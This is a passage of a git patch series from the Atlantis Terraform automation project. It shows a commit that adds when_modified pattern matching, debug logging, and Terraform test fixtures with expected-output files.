+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after 0s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+this = overridden
+
+```
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+

From d9a47361e511ba30f9f281821a643071b9777735 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Mon, 18 Jun 2018 19:55:14 +0100
Subject: [PATCH 27/69] Implement when_modified.

---
 server/events/command_handler.go              |  2 +
 server/events/event_parser.go                 |  6 ++
 server/events/models/models.go                |  4 ++
 server/events/project_operator.go             |  6 ++
 server/events/pull_request_operator.go        | 64 +++++++++++++++++--
 server/events_controller.go                   | 14 ++++
 server/events_controller_e2e_test.go          | 56 ++++++++++++----
 .../test-repos/simple-yaml/atlantis.yaml      | 24 +++++++
 .../simple-yaml/exp-output-apply-default.txt  | 14 ++++
 .../simple-yaml/exp-output-apply-staging.txt  | 14 ++++
 .../simple-yaml/exp-output-autoplan.txt       | 51 +++++++++++++++
 .../simple-yaml/exp-output-merge.txt          |  3 +
 .../test-repos/simple-yaml/main.tf            | 15 +++++
 .../test-repos/simple-yaml/staging.tfvars     |  1 +
 .../testfixtures/test-repos/simple/.gitkeep   |  0
 ...exp-output-apply-var-default-workspace.txt | 14 ++++
 .../exp-output-apply-var-new-workspace.txt    | 14 ++++
 .../simple/exp-output-apply-var.txt           |  3 +-
 .../test-repos/simple/exp-output-apply.txt    |  3 +-
 ...exp-output-atlantis-plan-new-workspace.txt | 23 +++++++
 ...t-atlantis-plan-var-default-workspace.txt} |  0
 .../simple/exp-output-merge-workspaces.txt    |  3 +
 server/testfixtures/test-repos/simple/main.tf |  6 +-
 23 files changed, 316 insertions(+), 24 deletions(-)
 create mode 100644 server/testfixtures/test-repos/simple-yaml/atlantis.yaml
 create mode 100644 server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt
 create mode 100644 server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt
 create mode 100644 server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt
 create mode 100644 server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt
 create mode 100644 server/testfixtures/test-repos/simple-yaml/main.tf
 create mode 100644 server/testfixtures/test-repos/simple-yaml/staging.tfvars
 delete mode 100644 server/testfixtures/test-repos/simple/.gitkeep
 create mode 100644 server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt
 create mode 100644 server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt
 create mode 100644 server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt
 rename server/testfixtures/test-repos/simple/{exp-output-atlantis-plan-var.txt => exp-output-atlantis-plan-var-default-workspace.txt} (100%)
 create mode 100644 server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt

diff --git a/server/events/command_handler.go b/server/events/command_handler.go
index e327c13ee3..601d3be099 100644
--- a/server/events/command_handler.go
+++ b/server/events/command_handler.go
@@ -150,6 +150,7 @@ func (c *CommandHandler) run(ctx *CommandContext) {
 		return
 	}
 
+	ctx.Log.Debug("updating commit status to pending")
 	if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, ctx.Command); err != nil {
 		ctx.Log.Warn("unable to update commit status: %s", err)
 	}
@@ -163,6 +164,7 @@ func (c *CommandHandler) run(ctx *CommandContext) {
 		c.updatePull(ctx, CommandResponse{Failure: errMsg})
 		return
 	}
+	ctx.Log.Debug("successfully acquired workspace lock")
 	defer c.AtlantisWorkspaceLocker.Unlock(ctx.BaseRepo.FullName, ctx.Command.Workspace, ctx.Pull.Num)
 
 	var cr CommandResponse
diff --git a/server/events/event_parser.go b/server/events/event_parser.go
index bfe08a6c68..448dcee867 100644
--- a/server/events/event_parser.go
+++ b/server/events/event_parser.go
@@ -14,8 +14,10 @@
 package events
 
 import (
+	"fmt"
 	"path"
 	"regexp"
+	"strings"
 
 	"github.com/google/go-github/github"
 	"github.com/lkysow/go-gitlab"
@@ -47,6 +49,10 @@ type Command struct {
 	Autoplan bool
 }
 
+func (c Command) String() string {
+	return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q autoplan=%t flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.Autoplan, strings.Join(c.Flags, ","))
+}
+
 // NewCommand constructs a Command, setting all missing fields to defaults.
 func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, autoplan bool) *Command {
 	// If dir was an empty string, this will return '.'.
diff --git a/server/events/models/models.go b/server/events/models/models.go
index 30faf4ea23..d4ba85fee0 100644
--- a/server/events/models/models.go
+++ b/server/events/models/models.go
@@ -163,6 +163,10 @@ type Project struct {
 	Path string
 }
 
+func (p Project) String() string {
+	return fmt.Sprintf("repofullname=%s path=%s", p.RepoFullName, p.Path)
+}
+
 // Plan is the result of running an Atlantis plan command.
 // This model is used to represent a plan on disk.
 type Plan struct {
diff --git a/server/events/project_operator.go b/server/events/project_operator.go
index 2c6c5c558b..5e7e7e43e9 100644
--- a/server/events/project_operator.go
+++ b/server/events/project_operator.go
@@ -62,10 +62,12 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr
 	if !lockAttempt.LockAcquired {
 		return ProjectResult{Failure: lockAttempt.LockFailureReason}
 	}
+	ctx.Log.Debug("acquired lock for project")
 
 	// Ensure project has been cloned.
 	var projAbsPath string
 	if projAbsPathPtr == nil {
+		ctx.Log.Debug("project has not yet been cloned")
 		repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace)
 		if err != nil {
 			if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil {
@@ -74,15 +76,19 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr
 			return ProjectResult{Error: err}
 		}
 		projAbsPath = filepath.Join(repoDir, ctx.RepoRelPath)
+		ctx.Log.Debug("project successfully cloned to %q", projAbsPath)
 	} else {
 		projAbsPath = *projAbsPathPtr
+		ctx.Log.Debug("project was already cloned to %q", projAbsPath)
 	}
 
 	// Use default stage unless another workflow is defined in config
 	stage := p.defaultPlanStage()
 	if ctx.ProjectConfig != nil && ctx.ProjectConfig.Workflow != nil {
+		ctx.Log.Debug("project configured to use workflow %q", *ctx.ProjectConfig.Workflow)
 		configuredStage := ctx.GlobalConfig.GetPlanStage(*ctx.ProjectConfig.Workflow)
 		if configuredStage != nil {
+			ctx.Log.Debug("project will use the configured stage for that workflow")
 			stage = *configuredStage
 		}
 	}
diff --git a/server/events/pull_request_operator.go b/server/events/pull_request_operator.go
index b393fb5b75..6012214f52 100644
--- a/server/events/pull_request_operator.go
+++ b/server/events/pull_request_operator.go
@@ -4,7 +4,9 @@ import (
 	"os"
 	"path/filepath"
 
+	"github.com/docker/docker/pkg/fileutils"
 	"github.com/hashicorp/go-version"
+	"github.com/pkg/errors"
 	"github.com/runatlantis/atlantis/server/events/models"
 	"github.com/runatlantis/atlantis/server/events/vcs"
 	"github.com/runatlantis/atlantis/server/events/yaml"
@@ -43,17 +45,24 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon
 	}
 
 	// Parse config file if it exists.
+	ctx.Log.Debug("parsing config file")
 	config, err := p.ParserValidator.ReadConfig(repoDir)
 	if err != nil && !os.IsNotExist(err) {
 		return CommandResponse{Error: err}
 	}
 	noAtlantisYAML := os.IsNotExist(err)
+	if noAtlantisYAML {
+		ctx.Log.Info("found no %s file", yaml.AtlantisYAMLFilename)
+	} else {
+		ctx.Log.Info("successfully parsed %s file", yaml.AtlantisYAMLFilename)
+	}
 
 	// We'll need the list of modified files.
 	modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull)
 	if err != nil {
 		return CommandResponse{Error: err}
 	}
+	ctx.Log.Debug("%d files were modified in this pull request", len(modifiedFiles))
 
 	// Prepare the project contexts so the ProjectOperator can execute.
 	var projCtxs []models.ProjectCommandContext
@@ -62,6 +71,7 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon
 	// was modified in the pull request.
 	if noAtlantisYAML {
 		modifiedProjects := p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, repoDir)
+		ctx.Log.Info("automatically determined that there were %d projects modified in this pull request: %s", len(modifiedProjects), modifiedProjects)
 		for _, mp := range modifiedProjects {
 			projCtxs = append(projCtxs, models.ProjectCommandContext{
 				BaseRepo:      ctx.BaseRepo,
@@ -79,8 +89,16 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon
 	} else {
 		// Otherwise, we use the projects that match the WhenModified fields
 		// in the config file.
-		matchingProjects := p.matchingProjects(modifiedFiles, config)
-		for _, mp := range matchingProjects {
+		matchingProjects, err := p.matchingProjects(ctx.Log, modifiedFiles, config)
+		if err != nil {
+			return CommandResponse{Error: err}
+		}
+		ctx.Log.Info("%d projects are to be autoplanned based on their when_modified config", len(matchingProjects))
+
+		// Use for i instead of range because need to get the pointer to the
+		// project config.
+		for i := 0; i < len(matchingProjects); i++ {
+			mp := matchingProjects[i]
 			projCtxs = append(projCtxs, models.ProjectCommandContext{
 				BaseRepo:      ctx.BaseRepo,
 				HeadRepo:      ctx.HeadRepo,
@@ -193,9 +211,41 @@ func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) Comman
 
 // matchingProjects returns the list of projects whose WhenModified fields match
 // any of the modifiedFiles.
-func (p *DefaultPullRequestOperator) matchingProjects(modifiedFiles []string, config valid.Spec) []valid.Project {
-	//todo
-	// match the modified files against the config
-	// remember the modified_files paths are relative to the project paths
-	return nil
+func (p *DefaultPullRequestOperator) matchingProjects(log *logging.SimpleLogger, modifiedFiles []string, config valid.Spec) ([]valid.Project, error) {
+	var projects []valid.Project
+	for _, project := range config.Projects {
+		log.Debug("checking if project at dir %q workspace %q was modified", project.Dir, project.Workspace)
+		if !project.Autoplan.Enabled {
+			log.Debug("autoplan disabled, ignoring")
+			continue
+		}
+		// Prepend project dir to when modified patterns because the patterns
+		// are relative to the project dirs but our list of modified files is
+		// relative to the repo root.
+		var whenModifiedRelToRepoRoot []string
+		for _, wm := range project.Autoplan.WhenModified {
+			whenModifiedRelToRepoRoot = append(whenModifiedRelToRepoRoot, filepath.Join(project.Dir, wm))
+		}
+		pm, err := fileutils.NewPatternMatcher(whenModifiedRelToRepoRoot)
+		if err != nil {
+			return nil, errors.Wrapf(err, "matching modified files with patterns: %v", project.Autoplan.WhenModified)
+		}
+
+		// If any of the modified files matches the pattern then this project is
+		// considered modified.
+		for _, file := range modifiedFiles {
+			match, err := pm.Matches(file)
+			if err != nil {
+				log.Debug("match err for file %q: %s", file, err)
+				continue
+			}
+			if match {
+				log.Debug("file %q matched pattern", file)
+				projects = append(projects, project)
+				break
+			}
+		}
+	}
+	// todo: check if dir is deleted though
+	return projects, nil
 }
diff --git a/server/events_controller.go b/server/events_controller.go
index e9ee6e1e01..d9e344fe55 100644
--- a/server/events_controller.go
+++ b/server/events_controller.go
@@ -65,6 +65,7 @@ func (e *EventsController) Post(w http.ResponseWriter, r *http.Request) {
 			e.respond(w, logging.Debug, http.StatusBadRequest, "Ignoring request since not configured to support GitHub")
 			return
 		}
+		e.Logger.Debug("handling GitHub post")
 		e.handleGithubPost(w, r)
 		return
 	} else if r.Header.Get(gitlabHeader) != "" {
@@ -72,6 +73,7 @@ func (e *EventsController) Post(w http.ResponseWriter, r *http.Request) {
 			e.respond(w, logging.Debug, http.StatusBadRequest, "Ignoring request since not configured to support GitLab")
 			return
 		}
+		e.Logger.Debug("handling GitLab post")
 		e.handleGitlabPost(w, r)
 		return
 	}
@@ -85,13 +87,16 @@ func (e *EventsController) handleGithubPost(w http.ResponseWriter, r *http.Reque
 		e.respond(w, logging.Warn, http.StatusBadRequest, err.Error())
 		return
 	}
+	e.Logger.Debug("request valid")
 
 	githubReqID := "X-Github-Delivery=" + r.Header.Get("X-Github-Delivery")
 	event, _ := github.ParseWebHook(github.WebHookType(r), payload)
 	switch event := event.(type) {
 	case *github.IssueCommentEvent:
+		e.Logger.Debug("handling as comment event")
 		e.HandleGithubCommentEvent(w, event, githubReqID)
 	case *github.PullRequestEvent:
+		e.Logger.Debug("handling as pull request event")
 		e.HandleGithubPullRequestEvent(w, event, githubReqID)
 	default:
 		e.respond(w, logging.Debug, http.StatusOK, "Ignoring unsupported event %s", githubReqID)
@@ -144,6 +149,7 @@ func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, p
 	default:
 		eventType = OtherPullEvent
 	}
+	e.Logger.Info("identified event as type %q", eventType)
 	e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGithubUser, eventType)
 }
 
@@ -177,6 +183,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep
 		// workspace to '*' to indicate that all applicable dirs and workspaces
 		// should be planned.
 		autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", true)
+		e.Logger.Info("executing command %s", autoplanCmd)
 		if !e.TestingMode {
 			go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd)
 		} else {
@@ -206,10 +213,14 @@ func (e *EventsController) handleGitlabPost(w http.ResponseWriter, r *http.Reque
 		e.respond(w, logging.Warn, http.StatusBadRequest, err.Error())
 		return
 	}
+	e.Logger.Debug("request valid")
+
 	switch event := event.(type) {
 	case gitlab.MergeCommentEvent:
+		e.Logger.Debug("handling as comment event")
 		e.HandleGitlabCommentEvent(w, event)
 	case gitlab.MergeEvent:
+		e.Logger.Debug("handling as pull request event")
 		e.HandleGitlabMergeRequestEvent(w, event)
 	default:
 		e.respond(w, logging.Debug, http.StatusOK, "Ignoring unsupported event")
@@ -239,6 +250,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
 		e.respond(w, logging.Debug, http.StatusOK, "Ignoring non-command comment: %q", truncated)
 		return
 	}
+	e.Logger.Info("parsed comment as %s", parseResult)
 
 	// At this point we know it's a command we're not supposed to ignore, so now
 	// we check if this repo is allowed to run commands in the first place.
@@ -260,6 +272,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo
 		return
 	}
 
+	e.Logger.Debug("executing command")
 	fmt.Fprintln(w, "Processing...")
 	if !e.TestingMode {
 		// Respond with success and then actually execute the command asynchronously.
@@ -292,6 +305,7 @@ func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter,
 	default:
 		eventType = OtherPullEvent
 	}
+	e.Logger.Info("identified event as type %q", eventType)
 	e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGitlabUser, eventType)
 }
 
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index a791a89bda..e2bb30ff6e 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -58,24 +58,48 @@ func TestGitHubWorkflow(t *testing.T) {
 		ExpMergeCommentFile    string
 		CommentAndReplies      []string
 	}{
+		//{
+		//	Description:            "simple",
+		//	RepoDir:                "simple",
+		//	ModifiedFiles:          []string{"main.tf"},
+		//	ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+		//	CommentAndReplies: []string{
+		//		"atlantis apply", "exp-output-apply.txt",
+		//	},
+		//	ExpMergeCommentFile: "exp-output-merge.txt",
+		//},
+		//{
+		//	Description:            "simple with comment -var",
+		//	RepoDir:                "simple",
+		//	ModifiedFiles:          []string{"main.tf"},
+		//	ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+		//	CommentAndReplies: []string{
+		//		"atlantis plan -- -var var=overridden", "exp-output-atlantis-plan.txt",
+		//		"atlantis apply", "exp-output-apply-var.txt",
+		//	},
+		//	ExpMergeCommentFile: "exp-output-merge.txt",
+		//},
+		//{
+		//	Description:            "simple with workspaces",
+		//	RepoDir:                "simple",
+		//	ModifiedFiles:          []string{"main.tf"},
+		//	ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+		//	CommentAndReplies: []string{
+		//		"atlantis plan -- -var var=default_workspace", "exp-output-atlantis-plan.txt",
+		//		"atlantis plan -w new_workspace -- -var var=new_workspace", "exp-output-atlantis-plan-new-workspace.txt",
+		//		"atlantis apply", "exp-output-apply-var-default-workspace.txt",
+		//		"atlantis apply -w new_workspace", "exp-output-apply-var-new-workspace.txt",
+		//	},
+		//	ExpMergeCommentFile: "exp-output-merge-workspaces.txt",
+		//},
 		{
-			Description:            "simple",
-			RepoDir:                "simple",
+			Description:            "simple with atlantis.yaml",
+			RepoDir:                "simple-yaml",
 			ModifiedFiles:          []string{"main.tf"},
 			ExpAutoplanCommentFile: "exp-output-autoplan.txt",
 			CommentAndReplies: []string{
-				"atlantis apply", "exp-output-apply.txt",
-			},
-			ExpMergeCommentFile: "exp-output-merge.txt",
-		},
-		{
-			Description:            "simple with comment -var",
-			RepoDir:                "simple",
-			ModifiedFiles:          []string{"main.tf"},
-			ExpAutoplanCommentFile: "exp-output-autoplan.txt",
-			CommentAndReplies: []string{
-				"atlantis plan -- -var var=overridden", "exp-output-atlantis-plan-var.txt",
-				"atlantis apply", "exp-output-apply-var.txt",
+				"atlantis apply -w staging", "exp-output-apply-staging.txt",
+				"atlantis apply", "exp-output-apply-default.txt",
 			},
 			ExpMergeCommentFile: "exp-output-merge.txt",
 		},
@@ -118,6 +142,9 @@ func TestGitHubWorkflow(t *testing.T) {
 				// Replace all 'ID: 1111818181' strings with * so we can do a comparison.
 				idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`)
 				atlantisComment = idRegex.ReplaceAllString(atlantisComment, "(ID: ******************)")
+				if string(exp) != atlantisComment {
+					t.Logf("comment: %s", comment)
+				}
 				Equals(t, string(exp), atlantisComment)
 			}
 
@@ -332,6 +359,7 @@ func initializeRepo(t *testing.T, repoDir string) (string, func()) {
 
 	// Initialize the git repo.
 	runCmd(t, destDir, "git", "init")
+	runCmd(t, destDir, "touch", ".gitkeep")
 	runCmd(t, destDir, "git", "add", ".gitkeep")
 	runCmd(t, destDir, "git", "commit", "-m", "initial commit")
 	runCmd(t, destDir, "git", "checkout", "-b", "branch")
diff --git a/server/testfixtures/test-repos/simple-yaml/atlantis.yaml b/server/testfixtures/test-repos/simple-yaml/atlantis.yaml
new file mode 100644
index 0000000000..62e6047617
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/atlantis.yaml
@@ -0,0 +1,24 @@
+version: 2
+projects:
+- dir: .
+  workspace: default
+  workflow: default
+- dir: .
+  workspace: staging
+  workflow: staging
+workflows:
+  default:
+    # Only specify plan so should use default apply workflow.
+    plan:
+      steps:
+      - init
+      - plan:
+          extra_args: [-var, var=fromconfig]
+  staging:
+    plan:
+      steps:
+      - init
+      - plan:
+          extra_args: [-var-file, staging.tfvars]
+    apply:
+      steps: [apply]
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt
new file mode 100644
index 0000000000..4c1f22f7a9
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after 0s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = fromconfig
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..d467c8c713
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `staging`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after 0s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = fromfile
+workspace = staging
+
+```
+
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt
new file mode 100644
index 0000000000..6611b1b70b
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-autoplan.txt
@@ -0,0 +1,51 @@
+Ran Plan for 2 projects:
+1. workspace: `default` path: `.`
+1. workspace: `staging` path: `.`
+
+### 1. workspace: `default` path: `.`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+### 2. workspace: `staging` path: `.`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt
new file mode 100644
index 0000000000..0abe4f2f13
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/exp-output-merge.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `staging`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple-yaml/main.tf b/server/testfixtures/test-repos/simple-yaml/main.tf
new file mode 100644
index 0000000000..39f891a7b0
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/main.tf
@@ -0,0 +1,15 @@
+resource "null_resource" "simple" {
+  count = "1"
+}
+
+variable "var" {
+  default = "default"
+}
+
+output "var" {
+  value = "${var.var}"
+}
+
+output "workspace" {
+  value = "${terraform.workspace}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple-yaml/staging.tfvars b/server/testfixtures/test-repos/simple-yaml/staging.tfvars
new file mode 100644
index 0000000000..6cf6f711e1
--- /dev/null
+++ b/server/testfixtures/test-repos/simple-yaml/staging.tfvars
@@ -0,0 +1 @@
+var= "fromfile"
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple/.gitkeep b/server/testfixtures/test-repos/simple/.gitkeep
deleted file mode 100644
index e69de29bb2..0000000000
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt
new file mode 100644
index 0000000000..ef14ca06f5
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after 0s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = default_workspace
+workspace = default
+
+```
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt
new file mode 100644
index 0000000000..e17039ffce
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt
@@ -0,0 +1,14 @@
+Ran Apply in dir: `.` workspace: `new_workspace`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after 0s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = new_workspace
+workspace = new_workspace
+
+```
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt
index 3c58045de2..8c49494b4a 100644
--- a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt
+++ b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt
@@ -7,7 +7,8 @@ Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
 
 Outputs:
 
-this = overridden
+var = overridden
+workspace = default
 
 ```
 
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply.txt b/server/testfixtures/test-repos/simple/exp-output-apply.txt
index 4d254afae5..6c123ea8f5 100644
--- a/server/testfixtures/test-repos/simple/exp-output-apply.txt
+++ b/server/testfixtures/test-repos/simple/exp-output-apply.txt
@@ -7,7 +7,8 @@ Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
 
 Outputs:
 
-this = default
+var = default
+workspace = default
 
 ```
 
diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt
new file mode 100644
index 0000000000..2aea0c8cb6
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-new-workspace.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `new_workspace`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt b/server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var-default-workspace.txt
similarity index 100%
rename from server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt
rename to server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var-default-workspace.txt
diff --git a/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt
new file mode 100644
index 0000000000..1b856aa5c4
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `new_workspace`
diff --git a/server/testfixtures/test-repos/simple/main.tf b/server/testfixtures/test-repos/simple/main.tf
index 028fbb2139..588b3db4df 100644
--- a/server/testfixtures/test-repos/simple/main.tf
+++ b/server/testfixtures/test-repos/simple/main.tf
@@ -6,6 +6,10 @@ variable "var" {
   default = "default"
 }
 
-output "this" {
+output "var" {
   value = "${var.var}"
+}
+
+output "workspace" {
+  value = "${terraform.workspace}"
 }
\ No newline at end of file

From e7d5bf54fbb0c565f2f9956d4e39e3e9dcb0490b Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Mon, 18 Jun 2018 20:54:58 +0100
Subject: [PATCH 28/69] Implement not deleting repo when same sha

---
 server/events/atlantis_workspace.go           |  31 ++-
 server/events/command_handler.go              |   2 +-
 server/events/markdown_renderer.go            |   8 +-
 server/events_controller_e2e_test.go          | 178 ++++++++++++------
 .../test-repos/modules-yaml/atlantis.yaml     |   8 +
 .../exp-output-apply-production.txt           |  13 ++
 .../modules-yaml/exp-output-apply-staging.txt |  13 ++
 .../modules-yaml/exp-output-autoplan.txt      |  51 +++++
 .../exp-output-merge-all-dirs.txt             |   4 +
 .../exp-output-merge-only-staging.txt         |   3 +
 .../modules-yaml/exp-output-merge.txt         |   4 +
 .../exp-output-plan-production.txt            |  23 +++
 .../modules-yaml/exp-output-plan-staging.txt  |  23 +++
 .../modules-yaml/modules/null/main.tf         |  10 +
 .../modules-yaml/production/main.tf           |   7 +
 .../test-repos/modules-yaml/staging/main.tf   |   7 +
 .../modules/exp-output-apply-production.txt   |  13 ++
 .../modules/exp-output-apply-staging.txt      |  13 ++
 .../exp-output-autoplan-only-modules.txt      |   2 +
 .../exp-output-autoplan-only-staging.txt      |  23 +++
 .../modules/exp-output-merge-all-dirs.txt     |   4 +
 .../modules/exp-output-merge-only-staging.txt |   3 +
 .../test-repos/modules/exp-output-merge.txt   |   4 +
 .../modules/exp-output-plan-production.txt    |  23 +++
 .../modules/exp-output-plan-staging.txt       |  23 +++
 .../test-repos/modules/modules/null/main.tf   |  10 +
 .../test-repos/modules/production/main.tf     |   7 +
 .../test-repos/modules/staging/main.tf        |   7 +
 .../simple/exp-output-merge-workspaces.txt    |   2 +-
 29 files changed, 448 insertions(+), 71 deletions(-)
 create mode 100644 server/testfixtures/test-repos/modules-yaml/atlantis.yaml
